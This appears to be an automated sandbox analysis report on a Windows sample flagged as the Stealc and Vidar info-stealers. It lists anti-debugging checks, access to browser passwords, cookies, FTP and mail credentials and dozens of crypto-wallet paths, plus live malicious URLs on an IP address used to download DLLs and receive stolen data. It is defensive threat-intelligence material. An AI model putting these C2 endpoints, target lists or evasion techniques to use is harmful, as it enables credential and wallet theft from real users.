Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BE45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_00BE45C0

Source: C:\Users\user\Desktop\file.exe

0_2_00BF9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF9750 mov eax, dword ptr fs:[00000030h]

0_2_00BF9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_00BF78E0

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00BF9600

Source: file.exe, file.exe, 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: UProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00BF7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00BF7980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00BF7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00BF7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1710578574.0000000005570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: n\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Led
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.4b

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1710578574.0000000005570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	641 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	52%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	URL Reputation	malware
http://185.215.113.37	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	URL Reputation	malware
http://185.215.113.37/e2b1563c6670f193.phpser	100%	URL Reputation	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	URL Reputation	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	URL Reputation	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/vcruntime	17%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/0d60be0de163924d/mozglue.dll3	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true	17%, Virustotal, Browse	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37JJDHIE--	file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpVi	file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	true	URL Reputation: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1795281516.000000001DBCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
